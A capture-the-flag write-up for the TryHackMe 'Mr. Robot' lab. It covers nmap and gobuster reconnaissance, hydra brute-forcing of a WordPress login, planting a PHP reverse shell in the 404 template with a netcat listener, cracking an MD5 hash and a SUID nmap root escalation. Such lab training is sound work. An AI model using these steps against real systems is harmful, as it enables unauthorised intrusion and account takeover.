[ Mr. Robot ] - TRYHACKME



Machine Name: Mr. Robot
Difficulty: Medium

Link: https://tryhackme.com/room/mrrobot

Hello guys! This machine is based on the popular web series Mr. Robot. It is a medium-difficulty machine and contains three flags, so let's capture all three one by one.

Initial recon

As usual, we start by scanning the target with nmap to check which services are running on the IP address.

Flags used in the nmap scan:
-sV for service version detection
-sC for scanning with the default NSE scripts
-oA for output in the three major formats at once

nmap -sV -sC -oA mrrobot 10.10.108.7

Only a couple of ports are open; let's have a look at port 80 in the browser.

An interesting site is shown on port 80.

Use gobuster to enumerate the website's directories; type the following command in the terminal to start the search.

gobuster -t 100 dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.108.7/


The gobuster scan shows many hosted directories. Among them robots.txt is interesting to us because it points to our first key and to a dictionary file named fsocity.dic.


fsocity.dic is used to find the username and password for the WordPress login.

Now we can grab our first key from http://10.10.108.7/ using wget. Run this command in the terminal:

wget http://10.10.108.7/key-1-of-3.txt


Gain Access

The gobuster scan also found the WordPress login page, so let's check out the URL http://10.10.108.7/wp-login

This page gives access to the admin control panel of the WordPress server, so let's find the admin's username and password. Here we can use the fsocity.dic file to brute-force the login form.


The error message for an invalid username tells us that we have to find both the username and the password for the WordPress login form. This is fairly easy because we already found the fsocity.dic file during the initial recon; this dictionary file helps us find both. Fire up Burp first to intercept the login request.

We can use the captured POST parameters to find the username with hydra:

hydra -V -L fsocity.dic -p 123 10.10.108.7 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

After a few seconds we find the username: Elliot. Now repeat with hydra, this time fixing the username and iterating over the passwords (the failure string changes, because WordPress now reports an incorrect password rather than an invalid username):

hydra -V -l Elliot -P fsocity.dic 10.10.108.7 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=incorrect'

We find the password in the file as ERxx-06xx; now we can log in to WordPress.

A quick look around and we find a place to upload content on the WordPress server. Let's upload a reverse shell so we can connect back. Grab the PHP script from Kali: php-reverse-shell.php is pre-installed in /usr/share/webshells/php

It's the same version as the one on pentestmonkey.

Copy the content of php-reverse-shell.php and paste it into the 404.php template, overwriting everything that was there before. Don't forget to change the IP to your tun0 IP.


Now it's time to fire up the listener. I am using netcat to listen on port 1234:

nc -lnvp 1234

After starting the listener, trigger php-reverse-shell using curl:

curl http://10.10.108.7/404.php

After running this command we get a shell from the server, and now we can upgrade it.

Type this command in the open session:

python -c 'import pty; pty.spawn("/bin/bash")'

This command spawns a bash shell.

daemon@linux:/home/robot$ ls
ls
key-2-of-3.txt  password.raw-md5
daemon@linux:/home/robot$ cat password.raw-md5
cat password.raw-md5
<<HIDDEN>>

This md5 hash contains the password for the user robot, so let's crack it with CrackStation. After a second we have the password for the user robot; now log in as robot and cat key-2-of-3.txt. Success, we have another key. Now it's time to root the machine and grab the last key.


Privilege Escalation

Now we need to escalate to root to get the last key. First we look for files with the SUID bit set, since these run with the privileges of their owner, which lets us run as root.

Type the command:

find / -perm -4000 2>/dev/null


We see nmap in the list, so we can easily use nmap's interactive mode to get a root shell.

Type the command:

nmap --interactive

Now we have nmap interactive mode.

To get the root shell, type !sh in nmap interactive mode.

Now we have a root shell; type cat /root/key-3-of-3.txt to get the last root key.
